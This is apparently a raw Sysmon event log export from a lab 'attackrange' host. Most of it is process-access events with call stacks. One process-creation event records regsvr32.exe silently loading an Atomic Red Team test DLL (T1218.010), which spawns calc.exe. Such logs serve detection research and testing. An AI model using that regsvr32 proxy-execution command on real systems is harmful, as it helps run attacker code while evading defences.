Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361966Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361965Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361964Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361963Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361962Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361961Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361960Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361959Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361958Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361957Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361956Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361955Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361954Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361953Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.444{8e433fbf-3708-6013-b803-000000001100}64128556C:\Windows\syswow64\regsvr32.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\wow64.dll+104f8|C:\Windows\System32\wow64.dll+fce0|C:\Windows\System32\wow64.dll+7123|C:\Windows\System32\wow64cpu.dll+1783|C:\Windows\System32\wow64cpu.dll+1199|C:\Windows\System32\wow64.dll+c77a|C:\Windows\System32\wow64.dll+c637|C:\Windows\SYSTEM32\ntdll.dll+d3fb3|C:\Windows\SYSTEM32\ntdll.dll+c1db5|C:\Windows\SYSTEM32\ntdll.dll+71853|C:\Windows\SYSTEM32\ntdll.dll+717fe|C:\Windows\SYSTEM32\ntdll.dll+729bc(wow64)|C:\Windows\System32\KERNELBASE.dll+1092fb(wow64)|C:\Windows\System32\KERNELBASE.dll+1078ac(wow64)|C:\Windows\System32\windows.storage.dll+1f087b(wow64)|C:\Windows\System32\windows.storage.dll+108a12(wow64)|C:\Windows\System32\windows.storage.dll+1048cd(wow64)|C:\Windows\System32\windows.storage.dll+10480a(wow64)|C:\Windows\System32\windows.storage.dll+105ec7(wow64)|C:\Windows\System32\windows.storage.dll+1043ae(wow64)|C:\Windows\System32\windows.storage.dll+108ec2(wow64)|C:\Windows\System32\SHELL32.dll+154218(wow64)|C:\Windows\System32\SHELL32.dll+152fb7(wow64) 154100x8000000000000000361952Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.452{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=0F47684C213A9A4E77E9CB5CD3A1C70D,SHA256=1E09EFA45DB40FE1803E421EF090B82494600CBAD1A5184BE4B7B4158B62B642,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\SysWOW64\regsvr32.exeC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll 10341000x8000000000000000361951Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361950Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361949Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361948Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361947Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361946Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361945Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361944Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361943Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 